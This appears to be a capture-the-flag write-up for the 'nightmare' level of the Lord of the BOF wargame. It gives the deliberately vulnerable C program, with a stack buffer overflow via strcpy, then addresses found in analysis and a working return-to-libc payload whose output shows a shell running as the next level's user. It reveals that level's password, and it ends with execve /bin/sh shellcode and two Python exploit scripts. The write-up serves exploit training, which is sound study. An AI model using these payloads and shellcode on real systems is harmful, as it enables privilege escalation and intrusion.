/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
/*
 * main - entry point of the "nightmare" challenge binary.
 *
 * Deliberately vulnerable: it copies argv[1] into a fixed 40-byte stack
 * buffer with strcpy() and then writes 4 bytes past the end of that buffer
 * with memset(). Nothing from <dumpcode.h> (a non-standard header) is
 * called here. The function is declared without a return type (implicit
 * int, pre-C99) and never returns a value.
 *
 * argv[1] is required; anything else prints "argv error" and exits 0.
 */
main(int argc, char *argv[])
{
char buffer[40];   /* 40-byte stack buffer; no bound is enforced on the copy below */
char *addr;        /* receives the address taken from &strcpy */
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
/* Address of strcpy as seen by this binary (the analysis section lists it as
 * 0x8048410, i.e. the PLT entry rather than the libc function). */
addr = (char *)&strcpy;
/* Reads 4 bytes at argv[1]+44 without checking that argv[1] is that long, so
 * a short argument turns this into an out-of-bounds read. Offset 44 presumably
 * lines up with the saved return address (40-byte buffer + 4-byte saved frame
 * pointer); that depends on the compiler's frame layout, not on this code. */
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!
/* Unbounded copy: an argv[1] longer than 39 bytes writes past `buffer` into
 * whatever the compiler placed above it (saved frame pointer, return address). */
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
/* Out-of-bounds write: buffer+48 is 8 bytes past the end of the 40-byte array.
 * Using the analysis figures (ebp-40 = 0xbffffaa0, ret+4 = 0xbffffad0),
 * buffer+48 is the 4-byte slot just above the return address, so those bytes
 * are overwritten with 'A' regardless of what argv[1] placed there. A stack
 * protector or AddressSanitizer would flag both this and the strcpy above. */
memset(buffer+40+8, 'A', 4);
}
0x01. Analysis
strcpy = 0x8048410
system = 0x40058ae0
ebp-40 = 0xbffffaa0
“/bin/sh” = 0x400fbff9
ret+4 = 0xbffffad0
char *strcpy(char *_Dest, char const *_Source);
0x02. Exploit
[succubus@localhost succubus]$ ./nightmare `python -c 'print "\xe0\x8a\x05\x40"+"A"*4+"\xf9\xbf\x0f\x40"+"A"*32+"\x10\x84\x04\x08"+"A"*4+"\xd0\xfa\xff\xbf"+"\xa0\xfa\xff\xbf"'`
�@AAAA�@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������
bash$ id
uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)
bash$ my-pass
euid = 518
beg for me
shellcode 이용 코드
shellcode (24 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
import os
import struct
# Appends x to the module-level `payload` string read at call time; every
# `payload = append(...)` line below rebinds it, so the order of those lines
# is what fixes the byte layout.
append = lambda x: payload + x
# Packs an int as 4 little-endian bytes (32-bit x86 pointer layout).
p32 = lambda x: struct.pack("<I", x)
# NOTE(review): `payload` is a str concatenated with struct.pack output, so this
# is Python 2 code; under Python 3 struct.pack returns bytes and the
# concatenation raises TypeError.
target = "/home/succubus/nightmare"
# The 24-byte shellcode given in the section above; it occupies the start of buffer[40].
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
strcpy_plt = 0x8048410  # "strcpy = 0x8048410" from the analysis; the binary's memcmp check requires this value at argv[1]+44
main_ret = 0xbffffbdc   # stack address of main's saved return address; presumably read in a debugger — not derived on this page
shellcode_addr = main_ret + 16  # payload offset 60, i.e. the slot holding buffer_addr below
buffer_addr = main_ret - 44     # start of buffer[40]: 40 bytes + 4-byte saved ebp below the return address
payload = shellcode # buffer[40] + sfp
payload = append("\x90"*(44-len(shellcode)))  # NOP padding up to offset 44
payload = append(p32(strcpy_plt)) # ret -- offsets 44..47
payload = append("\x90"*4) # padding -- offsets 48..51, the slot main's memset(buffer+40+8, 'A', 4) overwrites
payload = append(p32(main_ret+4)) # strcpy arg1 -- offsets 52..55
payload = append(p32(shellcode_addr)) # strcpy arg2 -- offsets 56..59
payload = append(p32(buffer_addr))  # offsets 60..63
# Run the target in a child process with the payload as argv[1]; the parent only waits.
pid = os.fork()
if pid == 0:
    os.execv(target, (target, payload))
else:
    os.waitpid(pid, 0)
환경변수 이용 코드
# Register the shellcode in an environment variable first, then run this script.
import os
import struct
# Appends x to the module-level `payload` string read at call time; each
# `payload = append(...)` line below rebinds it, so line order fixes the layout.
append = lambda x: payload + x
# Packs an int as 4 little-endian bytes (32-bit x86 pointer layout).
p32 = lambda x: struct.pack("<I", x)
# NOTE(review): str concatenated with struct.pack output -- Python 2 only;
# Python 3 would raise TypeError here.
target = "/home/succubus/nightmare"
strcpy_plt = 0x8048410  # "strcpy = 0x8048410" from the analysis; required at argv[1]+44 by the binary's memcmp check
main_ret = 0xbffffbdc   # stack address of main's saved return address; presumably read in a debugger -- not derived on this page
shellcode_addr = 0xbffffbec  # equals main_ret + 16, the same slot the previous script computes
shellcode_env = 0xbffffe8b   # address of the shellcode inside the environment block; how it was obtained is not shown on this page
payload = "\x90"*44 # buffer[40] + sfp -- no shellcode in the buffer this time, only NOP padding
payload = append(p32(strcpy_plt)) # ret -- offsets 44..47
payload = append("\x90"*4) # padding -- offsets 48..51, the slot main's memset(buffer+40+8, 'A', 4) overwrites
payload = append(p32(main_ret+4)) # strcpy arg1 -- offsets 52..55
payload = append(p32(shellcode_addr)) # strcpy arg2 -- offsets 56..59
payload = append(p32(shellcode_env))  # offsets 60..63
# Run the target in a child process with the payload as argv[1]; the parent only waits.
pid = os.fork()
if pid == 0:
    os.execv(target, (target, payload))
else:
    os.waitpid(pid, 0)